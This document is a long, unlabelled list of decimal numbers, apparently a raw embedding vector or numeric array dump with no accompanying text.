0.010211252607405186, -0.014254136011004448, 0.018074065446853638, 0.01379336602985859, 0.004187802784144878, -0.018534835427999496, -0.002788771875202656, 0.005815360229462385, 0.052884478121995926, 0.014700042083859444, -0.007587837520986795, 0.01438047643750906, -0.014722337014973164, -0.010174093768000603, 0.0020251574460417032, -0.011556402780115604, 0.012782645411789417, 0.011801651678979397, 0.007372316438704729, 0.0234398040920496, -0.013131938874721527, 0.016989028081297874, 0.016230987384915352, -0.03620758652687073, -0.003593261120840907, 0.023945163935422897, 0.00713078398257494, 0.03374023735523224, -0.022874990478157997, -0.04265836253762245, -0.019307740032672882, -0.02624901384115219, -0.009319440461695194, 0.00719023821875453, 0.002567676827311516, 0.0441744439303875, -0.02409379929304123, -0.005012729205191135, -0.011935423128306866, -0.029979761689901352, -0.04676070064306259, 0.003481784602627158, 0.01617153361439705, -0.03929920122027397, 0.0007896256283856928, 0.029816264286637306, -0.035731952637434006, 0.0018133519915863872, 0.0037902030162513256, -0.01832674629986286, -0.052646663039922714, 0.003489216323941946, 0.02801777422428131, 0.008331014774739742, -0.011801651678979397, 0.019471239298582077, -0.02424243465065956, -0.004994149785488844, 0.02060086838901043, 0.03751557692885399, 0.04622561112046242, -0.03915056586265564, 0.0019136809278279543, -0.005722463130950928, -0.013741343282163143, 0.0183713361620903, 0.0178065225481987, -0.008932988159358501, 0.0017083782004192472, 0.020348187536001205, -0.024599160999059677, 0.004232393112033606, -0.010240979492664337, -0.012017172761261463, 0.003920258954167366, -0.040993645787239075, -0.004622561391443014, -0.028404226526618004, 0.02717055380344391, -0.02069004997611046, 0.05205212160944939, 0.015294583514332771, 0.023930301889777184, 0.04135037213563919, -0.00319937733002007, 0.016884982585906982, -0.02725973352789879, -0.049287501722574234, 0.001965703209862113, 0.03039594180881977, -0.013622435741126537, -0.03546440973877907, 0.040012653917074203, 0.02027386985719204, 0.028136683627963066, -0.0009874964598566294, 0.02675437368452549, 0.000046913050027797, 0.03362132981419563, -0.016528258100152016, -0.028642043471336365, 0.0022927012760192156, -0.0010850385297089815, -0.035910315811634064, 0.010619999840855598, -0.024212708696722984, 0.0026903010439127684, -0.0571354515850544, -0.007338873576372862, -0.01654312200844288, 0.0023224283941090107, 0.008620853535830975, 0.009772778488695621, 0.009386326186358929, -0.016439076513051987, -0.03159988671541214, -0.005042456090450287, 0.04646342992782593, 0.015874261036515236, 0.014127795584499836, -0.003271837020292878, -0.007312862202525139, 0.02274121716618538, -0.013830524869263172, -0.0034018929582089186, -0.002889100695028901, -0.011742197908461094, 0.03739666938781738, -0.009482938796281815, 0.01584453508257866, -0.01183881051838398, 0.030470259487628937, 0.006930125877261162, -0.015963442623615265, -0.01915910467505455, 0.02498561330139637, -0.03665349259972572, 0.0004672725626733154, -0.0156661719083786, 0.0173011627048254, -0.01985769160091877, 0.034929320216178894, 0.001848652958869934, -0.012254989705979824, -0.004682015627622604, -0.006788922473788261, -0.0029708503279834986, 0.00027009841869585216, -0.005945416633039713, 0.010181525722146034, -0.004704310558736324, -0.0006363453576341271, 0.02931090258061886, 0.005830224137753248, 0.02088327519595623, -0.0006851163343526423, 0.023320896551012993, -0.004615129437297583, 0.013748775236308575, 0.004392176400870085, -0.017316024750471115, 0.029028495773673058, -0.03751557692885399, -0.031153982505202293, 0.03338351473212242, 0.021745361387729645, 0.01710793562233448, -0.021076500415802002, -0.02251826412975788, 0.005399181507527828, -0.025342337787151337, -0.005376886110752821, -0.0011203393805772066, -0.031391799449920654, 0.013124506920576096, -0.04750387743115425, -0.011563834734261036, 0.016721483319997787, 0.013644730672240257, -0.025000475347042084, 0.007914835587143898, -0.017093071714043617, 0.034007780253887177, -0.010924702510237694, 0.005477214697748423, -0.00964643806219101, -0.0018087071366608143, -0.003704737639054656, 0.03136207163333893, 0.005923121236264706, 0.0006707172724418342, 0.013280574232339859, -0.009475507773458958, 0.0031863716430962086, -0.01356298103928566, 0.01571076363325119, 0.017494387924671173, -0.020125234499573708, -0.03287815302610397, -0.0007311004446819425, 0.012314443476498127, -0.0062464033253490925, -0.024227572605013847, 0.016439076513051987, 0.034750960767269135, 0.0015969016822054982, 0.07051263749599457, -0.0023298601154237986, 0.02097245678305626, -0.0004224496951792389, 0.001283838413655758, 0.010463932529091835, -0.02489643171429634, 0.010961861349642277, 0.016528258100152016, -0.04277727007865906, 0.013756207190454006, 0.020021189004182816, 0.01551753655076027, 0.031956613063812256, 0.00669974135234952, -0.024391070008277893, -0.010932134464383125, -0.005447487812489271, -0.026858419179916382, 0.018891559913754463, 0.012500237673521042, -0.02236962877213955, -0.020719775930047035, 0.035315774381160736, 0.04708769917488098, 0.008130356669425964, -0.014321021735668182, 0.013785934075713158, 0.011132792569696903, 0.00058850331697613, -0.009639006108045578, 0.013340028002858162, -0.027616459876298904, -0.0055886912159621716, 0.0007064826786518097, 0.01798488385975361, 0.02116568200290203, 0.03439423441886902, -0.02638278529047966, -0.014224409125745296, 0.00103394512552768, 0.019709056243300438, 0.018995605409145355, -0.015428355894982815, 0.025803107768297195, 0.0383182093501091, -0.003777197329327464, 0.006907830946147442, 0.007677019108086824, -0.014581133611500263, -0.034929320216178894, 0.0012067337520420551, -0.01158613059669733, 0.0015225840033963323, -0.0393289290368557, -0.0014315447770059109, 0.020496822893619537, 0.019471239298582077, -0.0018616585293784738, -0.020853547379374504, 0.006324436515569687, -0.0006721107638441026, -0.011221973225474358, -0.0026903010439127684, 0.003561676014214754, 0.015368901193141937, -0.0307675302028656, 0.005770769901573658, -0.005094478838145733, -0.002744181314483285, -0.0004421903577167541, 0.004273267928510904, -0.03035135008394718, 0.010493660345673561, -0.007554394658654928, -0.010567978024482727, -0.022399356588721275, -0.032045792788267136, 0.02037791535258293, 0.00030028997571207583, 0.017880840227007866, 0.005061035510152578, 0.026531420648097992, -0.01804433949291706, 0.041320644319057465, -0.02274121716618538, -0.025015339255332947, 0.0040763262659311295, -0.023514121770858765, -0.00034418387804180384, 0.008665444329380989, -0.008583694696426392, 0.013347459957003593, 0.010307866148650646, -0.008070902898907661, -0.010515955276787281, 0.033115968108177185, 0.004949558991938829, -0.02378166653215885, -0.00022132741287350655, -0.038674935698509216, -0.01868347078561783, 0.005425192415714264, -0.01612694188952446, 0.013548118062317371, 0.0024004618171602488, -0.003308995859697461, 0.009572120383381844, -0.013102211058139801, -0.014945290982723236, -0.00007553698378615081, -0.043698810040950775, 0.009527529589831829, -0.013258278369903564, 0.006305857095867395, -0.008264129050076008, -0.01062743179500103, 0.009661301970481873, 0.009728187695145607, -0.019545556977391243, 0.005410328973084688, 0.013979160226881504, -0.02769077755510807, 0.004581686574965715, 0.008992441929876804, -0.019842827692627907, 0.015027039684355259, 0.004314142744988203, 0.0037586179096251726, 0.00017905922140926123, 0.006272414233535528, -0.020303597673773766, -0.009029600769281387, -0.0050015817396342754, 0.01088754367083311, 0.015963442623615265, -0.019188830628991127, 0.027423232793807983, 0.007714177947491407, 0.008769488893449306, 0.0234398040920496, -0.039923470467329025, -0.010300434194505215, -0.015740489587187767, 0.03192688524723053, -0.031540434807538986, -0.007227397058159113, -0.013146801851689816, -0.029578447341918945, 0.01064972672611475, -0.011452358216047287, 0.03252142667770386, 0.03231333941221237, -0.0006502799224108458, 0.016483666375279427, -0.030277032405138016, 0.01608235202729702, 0.008353309705853462, 0.03329433128237724, -0.008383037522435188, -0.00045310574932955205, -0.004525948315858841, 0.019278012216091156, -0.022176403552293777, 0.009928845800459385, 0.005681588780134916, 0.0258625615388155, 0.025208566337823868, -0.015576991252601147, -0.013882547616958618, -0.029355494305491447, 0.02381139248609543, 0.011712470091879368, -0.007446634117513895, 0.033859144896268845, -0.014179818332195282, -0.0005833939649164677, -0.0016498530749231577, -0.005562680307775736, -0.02479238621890545, 0.04013156145811081, -0.015160812065005302, -0.009304576553404331, -0.033442966639995575, 0.02247367426753044, 0.026070650666952133, -0.0009405834716744721, -0.022681763395667076, 0.03052971325814724, -0.006948705296963453, -0.033680785447359085, -0.02465861476957798, -0.006796353962272406, -0.02437620796263218, -0.045185163617134094, 0.035494137555360794, -0.024405933916568756, 0.02581797167658806, -0.006432197522372007, -0.009973435662686825, 0.019263150170445442, 0.037634484469890594, -0.004451630637049675, 0.0026865850668400526, 0.0014668457442894578, -0.018148383125662804, 0.0013135654153302312, 0.003487358335405588, -0.030499985441565514, 0.001783624873496592, -0.00841276440769434, -0.059870343655347824, -0.007959426380693913, -0.03683185577392578, -0.0008044891874305904, 0.01207662746310234, 0.0339186005294323, 0.005885962396860123, 0.0018802379490807652, -0.0026791533455252647, -0.016706619411706924, 0.0023057067301124334, 0.007305430248379707, 0.026561148464679718, 0.02302362583577633, -0.010842952877283096, -0.0015931858215481043, 0.045928340405225754, -0.025282884016633034, -0.006053177174180746, -0.01501217670738697, -0.010084912180900574, -0.021656179800629616, -0.02605578675866127, -0.024822114035487175, 0.0048380824737250805, 0.01146722212433815, 0.0074540660716593266, 0.04343126714229584, 0.028969042003154755, -0.012864395044744015, -0.00678149051964283, -0.010151798836886883, 0.012767781503498554, 0.008427627384662628, -0.003740038489922881, -0.0003625310491770506, -0.01111792866140604, 0.03231333941221237, -0.00561841856688261, -0.006216675974428654, -0.005949132144451141, 0.002922543790191412, 0.015309447422623634, -0.016008034348487854, -0.0329078808426857, 0.0012048757635056973, -0.014268998987972736, -0.03537522628903389, -0.024212708696722984, 0.016840392723679543, 0.008843806572258472, -0.02363303117454052, -0.033353786915540695, -0.01088754367083311, -0.013436641544103622, 0.023737074807286263, 0.031153982505202293, -0.012165808118879795, -0.005079615395516157, -0.0010051470017060637, 0.03240251913666725, 0.013154233805835247, -0.07883622497320175, 0.012143513187766075, -0.01939692161977291, -0.012024604715406895, -0.017880840227007866, 0.004377312958240509, 0.02786913886666298, -0.0507144033908844, -0.03168907016515732, 0.032224155962467194, 0.03879384323954582, -0.0028352204244583845, -0.018475381657481194, -0.02931090258061886, -0.007242260500788689, -0.013719048351049423, -0.00314549682661891, 0.034661777317523956, -0.025134248659014702, 0.0036954479292035103, -0.018029475584626198, 0.0317782498896122, 0.0002975030511151999, 0.007416906766593456, 0.025461245328187943, 0.020169824361801147, -0.00560727110132575, 0.000676291121635586, -0.038377661257982254, -0.02208722196519375, -0.0025398076977580786, -0.04149900749325752, -0.0012596851447597146, 0.02116568200290203, 0.06432940810918808, 0.012574555352330208, -0.009713323786854744, -0.03272951766848564, 0.012091490440070629, -0.007483792956918478, -0.031302616000175476, -0.034929320216178894, 0.011073337867856026, -0.0005457706283777952, 0.0030098671559244394, 0.003853372996672988, -0.008620853535830975, 0.012983303517103195, 0.01209892239421606, 0.029340630397200584, 0.008866102434694767, 0.006272414233535528, 0.004187802784144878, -0.009051896631717682, -0.0398937426507473, -0.017316024750471115, 0.015681035816669464, 0.028790678828954697, -0.018297018483281136, 0.000889025570359081, 0.002524944022297859, 0.0023707346990704536, -0.014291294850409031, -0.012477942742407322, -0.011548971757292747, -0.014373044483363628, -0.017553841695189476, -0.0035746817011386156, -0.012106354348361492, -0.011534107849001884, 0.019129376858472824, -0.019382057711482048, -0.011303722858428955, -0.0026419945061206818, 0.025476109236478806, 0.004514800384640694, 0.023246578872203827, -0.020437369123101234, -0.019337467849254608, 0.006023449823260307, 0.032224155962467194, -0.04459062218666077, -0.013533254154026508, -0.022770944982767105, -0.01990228146314621, -0.013429209589958191, 0.008085766807198524, 0.03576168045401573, 0.020065780729055405, -0.01463315635919571, 0.02437620796263218, -0.017628159373998642, -0.013302869163453579, -0.012923848815262318, 0.01405347790569067, -0.019456375390291214, 0.012314443476498127, 0.018252428621053696, -0.01551753655076027, -0.011504380963742733, -0.005544100888073444, 0.01710793562233448, 0.027913730591535568, -0.002556529128924012, -0.020125234499573708, -0.006357879843562841, -0.0020121517591178417, 0.031391799449920654, -0.030083807185292244, 0.0058004967868328094, -0.00035602826392278075, 0.0005536669050343335, -0.02610037848353386, -0.011868537403643131, 0.009683596901595592, -0.021656179800629616, -0.010493660345673561, 0.025253156200051308, -0.019545556977391243, -0.029058223590254784, 0.0071084885857999325, -0.011006452143192291, 0.01883210614323616, 0.0001268045889446512, -0.005885962396860123, -0.004054030869156122, 0.000607547233812511, 0.03855602443218231, -0.02974194660782814, 0.01719711720943451, -0.01920369453728199, -0.026784101501107216, 0.00690039899200201, 0.00433643814176321, 0.030916165560483932, -0.026858419179916382, 0.00181799684651196, -0.010003163479268551, -0.005213386844843626, 0.010426773689687252, 0.011340881697833538, -0.0058896783739328384, -0.019679328426718712, 0.025386927649378777, -0.001490999013185501, -0.007788495626300573, 0.011251701042056084, 0.0025379497092217207, 0.007216249126940966, -0.017583569511771202, 0.0004524090327322483, 0.018297018483281136, -0.015695899724960327, -0.021641315892338753, 0.011578698642551899, 0.049109138548374176, -0.0032272464595735073, -0.029727082699537277, 0.003998292610049248, -0.009408621117472649, 0.012708327732980251, -0.00136001396458596, -0.004451630637049675, 0.018386200070381165, -0.03469150513410568, 0.021893996745347977, 0.010330161079764366, 0.04277727007865906, -0.020481958985328674, -0.008947852067649364, 0.003675010520964861, 0.00009330355533165857, -0.01957528293132782, 0.010991588234901428, -0.007309146225452423, -0.018861833959817886, -0.02489643171429634, 0.007186522241681814, -0.028077229857444763, -0.028315044939517975, -0.01415009144693613, -0.002638278529047966, 0.010642295703291893, -0.005094478838145733, -0.006131210830062628, -0.007019307464361191, 0.03353215008974075, -0.02550583705306053, -0.0033034218940883875, 0.040577467530965805, -0.025758516043424606, 0.011496949009597301, 0.001278264564462006, -0.02144809067249298, -0.03249170258641243, -0.017033617943525314, -0.005012729205191135, -0.006766627077013254, 0.01976851001381874, -0.03067834861576557, 0.010813225992023945, 0.016468804329633713, -0.0017371763242408633, 0.011764492839574814, 0.0063207210041582584, -0.021046774461865425, -0.009572120383381844, 0.013235983438789845, -0.017538977786898613, -0.0185942891985178, -0.012017172761261463, 0.0065511055290699005, 0.1015477105975151, -0.016349894925951958, 0.003242109902203083, -0.019887417554855347, 0.00292440177872777, 0.008851238526403904, 0.0037902030162513256, 0.015368901193141937, -0.011021316051483154, -0.007520951796323061, 0.026769237592816353, -0.019456375390291214, -0.01924828626215458, 0.007966858334839344, 0.02241422049701214, -0.0008644078043289483, -0.01001802645623684, -0.019278012216091156, 0.03424559906125069, -0.009861959144473076, 0.0259220153093338, -0.00561841856688261, 0.014811518602073193, -0.0207940936088562, 0.02540179155766964, -0.0019731351640075445, -0.034899596124887466, -0.02149268053472042, -0.01293128076940775, -0.015740489587187767, -0.00629099365323782, -0.0010079338680952787, -0.012983303517103195, -0.011378040537238121, 0.0004315071855671704, 0.0014566270401701331, 0.021403498947620392, 0.008383037522435188, -0.03379969298839569, -0.003773481585085392, 0.0033703078515827656, -0.004057746846228838, -0.019679328426718712, -0.011184814386069775, 0.02465861476957798, -0.01247051078826189, 0.04786060377955437, 0.0024692057631909847, -0.018609153106808662, -0.012180672027170658, 0.00255838711746037, -0.012953575700521469, 0.03650485724210739, 0.021789951249957085, 0.018846970051527023, 0.028850132599473, 0.012492806650698185, -0.005153933074325323, -0.008383037522435188, -0.02228044718503952, -0.010434205643832684, 0.01272319070994854, -0.007587837520986795, -0.0015049335779622197, 0.02679896540939808, -0.01687011867761612, -0.038110118359327316, -0.004176654852926731, -0.021225135773420334, 0.030737802386283875, 0.006948705296963453, 0.011221973225474358, -0.004254688508808613, -0.011013884097337723, 0.0226520374417305, 0.007112204562872648, 0.015398629009723663, 0.028820406645536423, -0.01479665469378233, -0.017509251832962036, 0.022027768194675446, 0.030187852680683136, 0.004302995279431343, 0.028983905911445618, -0.014120363630354404, 0.028864996507763863, -0.009148509241640568, -0.007193953730165958, -0.0024840692058205605, 0.0019285444868728518, 0.005551532376557589, 0.002786913886666298, 0.020913003012537956, -0.0016191969625651836, 0.005451203789561987, 0.025372063741087914, 0.02171563357114792, -0.006792638450860977, -0.012017172761261463, -0.015651308000087738, 0.004975570365786552, -0.017226845026016235, 0.024034345522522926, -0.004228677600622177, 0.0008746265084482729, 0.009096487425267696, -0.01137060858309269, 0.0153837651014328, 0.007156794890761375, -0.023410076275467873, -0.035167139023542404, -0.019842827692627907, 0.012596851214766502, -0.011519243940711021, -0.0077959271147847176, 0.038526300340890884, 0.005681588780134916, -0.013228551484644413, -0.019367193803191185, -0.03305651620030403, -0.008011448197066784, -0.029162267223000526, 0.048455145210027695, -0.018668606877326965, -0.0003116698644589633, 0.002998719457536936, -0.005778201390057802, -0.01380079798400402, 0.023335758596658707, 0.016721483319997787, 0.022874990478157997, 0.003968565259128809, 0.008821511641144753, -0.023855984210968018, 0.011548971757292747, -0.029979761689901352, 0.023647893220186234, 0.015249992720782757, 0.006079188082367182, -0.007736473344266415, -0.014321021735668182, 0.02378166653215885, 0.0277799591422081, -0.0039053955115377903, 0.011303722858428955, -0.00499786576256156, 0.007249691989272833, 0.0019285444868728518, 0.005937984678894281, 0.03341323882341385, -0.0019006753573194146, -0.02223585732281208, 0.010181525722146034, 0.019634738564491272, -0.008167515508830547, 0.015562127344310284, 0.010411910712718964, -0.01924828626215458, -0.001072961837053299, 0.0005378744099289179, 0.004916116129606962, 0.00012959149898961186, 0.015458082780241966, -0.0008003087714314461, -0.00830128788948059, 0.028463680297136307, 0.007368600461632013, -0.05107112601399422, -0.02176022343337536, -0.027943456545472145, -0.001744608161970973, -0.001214165473356843, -0.008420196361839771, -0.002961560618132353, 0.02662060223519802, -0.006617991719394922, 0.0007645434234291315, 0.026234149932861328, 0.022533128038048744, -0.03388887271285057, 0.007981721311807632, 0.019709056243300438, 0.0264273751527071, 0.020080644637346268, 0.008880965411663055, -0.02830018289387226, -0.007951994426548481, 0.0037660496309399605, -0.021789951249957085, 0.011786787770688534, 0.01747952401638031, 0.05133867263793945, -0.008717467077076435, -0.013362323865294456, -0.0033387229777872562, -0.01626071333885193, -0.02134404517710209, -0.0008709105895832181, -0.013696753419935703, 0.02330603264272213, 0.006547390017658472, -0.014514247886836529, 0.0004946772241964936, 0.0015569559764117002, -0.0020771799609065056, -0.02517883852124214, 0.003452057484537363, 0.012359034270048141, -0.0028389364015311003, -0.005941700655966997, -0.007060181815177202, 0.010449069552123547, 0.006584548857063055, -0.021091364324092865, -0.013897410593926907, -0.002318712417036295, 0.0022220993414521217, -0.0071828062646090984, 0.007937130518257618, -0.002244394738227129, 0.003069321159273386, 0.024970749393105507, 0.00913364626467228, 0.007056466303765774, -0.0023595872335135937, 0.0026587159372866154, 0.04048828408122063, -0.04013156145811081, -0.0028649475425481796, -0.0011714327847585082, -0.023603303357958794, -0.013243415392935276, -0.01640934869647026, 0.0092971445992589, -0.016379622742533684, -0.025059930980205536, 0.025892289355397224, 0.005532952956855297, -0.01270089577883482, -0.01272319070994854, 0.0033963192254304886, 0.0011630720691755414, -0.01724170707166195, 0.01503447163850069, -0.0053322953172028065, -0.0002461773983668536, -0.0017901277169585228, -0.009334303438663483, -0.0070341709069907665, 0.019679328426718712, -0.004849230404943228, -0.0022258153185248375, 0.00562956603243947, -0.0066774459555745125, -0.013458936475217342, 0.020496822893619537, 0.017167389392852783, -0.002251826459541917, 0.028969042003154755, 0.004893820732831955, 0.01097672525793314, -0.017375480383634567, -0.012671168893575668, 0.005993722938001156, -0.01415009144693613, 0.018861833959817886, 0.0019211126491427422, -0.002991287736222148, 0.013139369897544384, 0.010322729125618935, 0.012507669627666473, 0.000605689303483814, 0.006904114969074726, -0.00039504506275989115, -0.02074950374662876, -0.011965150944888592, 0.008390468545258045, -0.022206129506230354, -0.0020530265755951405, 0.0014027466531842947, -0.026531420648097992, 0.07425825297832489, -0.007840517908334732, -0.027289461344480515, -0.007788495626300573, -0.05062521994113922, -0.0153837651014328, -0.019961735233664513, -0.010515955276787281, -0.010523387230932713, -0.0017891987226903439, 0.007346305064857006, -0.013280574232339859, -0.031213436275720596, 0.04670124500989914, 0.0033944612368941307, -0.0205116868019104, 0.013763639144599438, -0.01023354846984148, 0.018624017015099525, 0.003957417793571949, 0.04236109182238579, 0.01798488385975361, 0.009713323786854744, -0.024688342586159706, 0.008546535857021809, -0.0078330859541893, -0.01961987465620041, 0.011051042936742306, -0.02797318436205387, 0.009542393498122692, -0.0017622585874050856, -0.0018941725138574839, -0.039596471935510635, -0.010471364483237267, -0.009408621117472649, -0.005911973305046558, 0.005729895085096359, -0.007996585220098495, 0.00032606892636977136, 0.008115493692457676, -0.016944436356425285, -0.006558537483215332, -0.0185942891985178, -0.021641315892338753, 0.017256570979952812, 0.0021867984905838966, 0.002967134350910783, -0.009676164947450161, -0.02040764130651951, 0.022072358056902885, 0.009155941195786, 0.02721514366567135, 0.005436340346932411, 0.020764367654919624, -0.005228250753134489, 0.012812372297048569, 0.016884982585906982, -0.011482085101306438, -0.013124506920576096, -0.023737074807286263, 0.02749755047261715, -0.008568831719458103, 0.017375480383634567, 0.009111350402235985, -0.0019229706376791, -0.007647291757166386, 0.0038942478131502867, 0.015093926340341568, -0.019709056243300438, -0.021983176469802856, 0.0011519244872033596, -0.004306711256504059, 0.039269477128982544, -0.00763242831453681, -0.006785206496715546, 0.009839664213359356, 0.036712948232889175, 0.013689321465790272, -0.021745361387729645, -0.0234992578625679, 0.001243892591446638, -0.013481231406331062, -0.008851238526403904, 0.012923848815262318, -0.00042918475810438395, 0.011288859881460667, 0.008256697095930576, 0.015339174307882786, -0.023424940183758736, -0.003853372996672988, 0.018430791795253754, 0.01489326823502779, 0.009438348934054375, -0.0011091917986050248, -0.008724899031221867, 0.01944151148200035, -0.0001705823524389416, -0.003883100114762783, 0.04051801189780235, 0.007892540656030178, -0.007591553498059511, 0.005893393885344267, 0.007420622743666172, -0.035821132361888885, 0.0029727083165198565, -0.00941605307161808, 0.014268998987972736, -0.005354590713977814, -0.013005598448216915, 0.014908132143318653, -0.005718747619539499, 0.016424212604761124, 0.025669336318969727, 0.02382625639438629, 0.011378040537238121, -0.018579427152872086, -0.00561841856688261, -0.018386200070381165, 0.015681035816669464, 0.0000944067069212906, -0.008561399765312672, 0.0015523111214861274, 0.008955283090472221, 0.026724647730588913, 0.023083079606294632, 0.004172939341515303, -0.0006447060732170939, 0.040250468999147415, -0.020942728966474533, 0.015235129743814468, -0.0028054933063685894, 0.008828943595290184, -0.029860854148864746, -0.027467824518680573, -0.007019307464361191, -0.001071103964932263, 0.0024078937713056803, 0.002638278529047966, -0.016245851293206215, 0.013533254154026508, -0.01794029399752617, -0.017078207805752754, -0.016275577247142792, 0.009847096167504787, -0.00964643806219101, 0.012113786302506924, -0.0031789399217814207, -0.015695899724960327, -0.0038979635573923588, 0.005997438915073872, 0.011645584367215633, 0.026204422116279602, -0.003708453383296728, -0.00213291822001338, -0.0008876320789568126, -0.013919706456363201, -0.0047897761687636375, 0.0024469103664159775, -0.007405759301036596, 0.025238292291760445, -0.018401063978672028, -0.008345878683030605, -0.0008904190035536885, -0.01850510947406292, -0.020199552178382874, -0.027007054537534714, -0.023618167266249657, -0.025386927649378777, 0.014098068699240685, 0.017330888658761978, 0.014848677441477776, 0.007104772608727217, 0.016305305063724518, 0.0071419314481318, -0.010441637597978115, 0.00073249387787655, 0.0058896783739328384, -0.017464660108089447, 0.017791658639907837, 0.003935122396796942, -0.02162645198404789, 0.02723000757396221, -0.0005987220210954547, 0.01206919550895691, 0.01715252548456192, -0.022429084405303, 0.008821511641144753, -0.0010488085681572556, -0.010872680693864822, 0.024257298558950424, -0.013027893379330635, 0.023469531908631325, 0.002532375743612647, -0.011742197908461094, -0.02274121716618538, -0.01584453508257866, -0.014157522469758987, -0.0011491375043988228, -0.02134404517710209, 0.019084786996245384, 0.003277410753071308, -0.01687011867761612, 0.009809937328100204, -0.0020883274264633656, 0.02171563357114792, 0.001706520328298211, 0.015458082780241966, 0.00633930042386055, 0.01798488385975361, 0.005555248353630304, 0.013273142278194427, -0.0058004967868328094, -0.006008586380630732, 0.027334051206707954, 0.022815534844994545, 0.01403118297457695, 0.021269727498292923, -0.001065530115738511, -0.01123683713376522, -0.0034724948927760124, -0.016751211136579514, 0.004343870095908642, 0.0009085339261218905, 0.002669863635674119, -0.007309146225452423, -0.00715307891368866, 0.014670315198600292, 0.005733611062169075, -0.02415325492620468, -0.008687740191817284, -0.008910693228244781, -0.003310853848233819, 0.0020140097476541996, 0.01911451295018196, 0.009713323786854744, -0.0009173591970466077, 0.00804117601364851, 0.006090336013585329, -0.007855381816625595, 0.012946144677698612, 0.016439076513051987, -0.006632855162024498, -0.027958320453763008, -0.004919832106679678, -0.0029429811984300613, 0.009490370750427246, 0.011459790170192719, -0.013994024135172367, -0.008360741659998894, 0.006610559765249491, -0.0010441637132316828, -0.012240125797688961, -0.004592834040522575, 0.004983002319931984, 0.005666724871844053, 0.010575409047305584, -0.017449798062443733, 0.007350021041929722, -0.012634010054171085, 0.0027924878522753716, -0.01526485662907362, 0.0034483415074646473, 0.012411057017743587, 0.01645394042134285, -0.012195535004138947, -0.00829385593533516, -0.010738908313214779, -0.015621582046151161, 0.0015606718370690942, -0.012046899646520615, -0.003920258954167366, 0.010122071020305157, -0.0226520374417305, -0.007598985452204943, 0.004373596981167793, -0.010032890364527702, 0.005718747619539499, -0.00017638843564782292, 0.016305305063724518, 0.001393456943333149, -0.015591854229569435, 0.02773536741733551, -0.0008063471177592874, 0.0021124808117747307, 0.020333323627710342, -0.00420638220384717, 0.006892967037856579, -0.0030971902888268232, -0.016186395660042763, 0.0057633379474282265, 0.006959853228181601, -0.006584548857063055, -0.0061572217382490635, -0.00032560445833951235, -0.015235129743814468, 0.009326872415840626, -0.009349167346954346, 0.00857626274228096, -0.0026958747766911983, 0.0032681210432201624, 0.011846242472529411, -0.025892289355397224, -0.0011259132297709584, -0.011400336399674416, -0.030826983973383904, 0.011965150944888592, -0.020006326958537102, -0.013273142278194427, 0.0033684500958770514, -0.0011890833266079426, 0.03326460346579552, -0.016349894925951958, 0.00363041996024549, 0.0025156543124467134, -0.017003890126943588, -0.01354068610817194, -0.012574555352330208, -0.01826729252934456, -0.004774912726134062, -0.005462351255118847, 0.01701875403523445, -0.007060181815177202, -0.005885962396860123, -0.0253572016954422, 0.003983429167419672, 0.027482686564326286, -0.010553114116191864, -0.012247557751834393, -0.0156661719083786, 0.015309447422623634, 0.014700042083859444, -0.004414471797645092, -0.006863240152597427, 0.0002543058944866061, -0.02177508734166622, 0.006424765568226576, -0.008375605568289757, -0.0070713297463953495, -0.017702477052807808, 0.01365959458053112, 0.0012894121464341879, 0.0021199125330895185, 0.012856963090598583, -0.005867382977157831, 0.005012729205191135, 0.007450350094586611, -0.03284842520952225, 0.018059201538562775, 0.0010822515469044447, -0.0023447235580533743, -0.0005977930268272758, 0.01939692161977291, 0.009876823052763939, -0.001607120386324823, 0.034750960767269135, -0.012477942742407322, -0.02782454900443554, 0.009936276823282242, 0.006465640384703875, -0.005544100888073444, 0.0069970120675861835, -0.0103970468044281, 0.00426583644002676, -0.007847949862480164, -0.002205377910286188, 0.026353057473897934, 0.0048529463820159435, -0.001814280985854566, 0.004016872029751539, 0.011043610982596874, 0.010352456010878086, -0.009289713576436043, 0.013949433341622353, -0.0018328604055568576, -0.016899846494197845, -0.0020864696707576513, 0.0016897987807169557, 0.000927113345824182, -0.009014737792313099, 0.012425919994711876, 0.004154359921813011, -0.018282156437635422, -0.004830650985240936, 0.015428355894982815, 0.00964643806219101, -0.012336739338934422, 0.011563834734261036, 0.00902216974645853, 0.02144809067249298, -0.021611588075757027, -0.004392176400870085, -0.013533254154026508, 0.003273695008829236, -0.020913003012537956, -0.012232694774866104, -0.002309422707185149, -0.014744632877409458, -0.009401190094649792, -0.017167389392852783, -0.003838509554043412, -0.0003058637958019972, 0.008390468545258045, -0.0207940936088562, -0.010701749473810196, -0.0394478365778923, 0.0014696326106786728, 0.0007376032299362123, -0.004823219031095505, 0.017791658639907837, 0.016097214072942734, -0.01985769160091877, 0.018891559913754463, 0.0030470259953290224, -0.0038719524163752794, -0.04200436547398567, -0.008836375549435616, 0.005670440848916769, -0.0031287753954529762, 0.009349167346954346, 0.016617439687252045, -0.004165507387369871, 0.01579994335770607, 0.02088327519595623, -0.009319440461695194, 0.007699314504861832, 0.004548243712633848, 0.011147655546665192, 0.014922995120286942, 0.0076918825507164, 0.008494514040648937, -0.013325165025889874, 0.006432197522372007, -0.0092971445992589, 0.001817067852243781, 0.012596851214766502, 0.01344407256692648, -0.00690039899200201, 0.026531420648097992, 0.013377186842262745, -0.00541776092723012, 0.014142659492790699, 0.020660322159528732, -0.015220265835523605, 0.011942855082452297, 0.013830524869263172, -0.026308467611670494, -0.016483666375279427, -0.01034502498805523, 0.0039759972132742405, -0.00007350485248025507, 0.021656179800629616, 0.021656179800629616, -0.013785934075713158, -0.000021961463062325493, -0.0019136809278279543, 0.008472218178212643, -0.012240125797688961, 0.0019879986066371202, -0.011556402780115604, 0.026174696162343025, -0.010738908313214779, 0.011125360615551472, 0.003453915473073721, -0.0112145422026515, 0.005536668933928013, -0.01517567504197359, 0.024866703897714615, -0.022770944982767105, 0.025193702429533005, -0.012455647811293602, 0.01822270080447197, -0.0074652135372161865, -0.0026940167881548405, 0.0259220153093338, 0.000943370396271348, -0.0027014485094696283, -0.004492505453526974, -0.0016851539257913828, -0.02153727039694786, 0.005610986612737179, -0.005142785143107176, 0.029296038672327995, 0.036623764783144, 0.001355369109660387, 0.0004298814747016877, -0.005272841081023216, -0.014692610129714012, -0.023424940183758736, 0.0011677169241011143, -0.009423485025763512, -0.000553202407900244, 0.037634484469890594, 0.0010915412567555904, 0.007149363402277231, -0.016230987384915352, 0.011013884097337723, -0.022161539644002914, -0.0028593738097697496, 0.009245122782886028, -0.0036099825520068407, -0.010151798836886883, -0.007966858334839344, 0.0007408546516671777, 0.04143955186009407, -0.0070453183725476265, -0.001568103558383882, 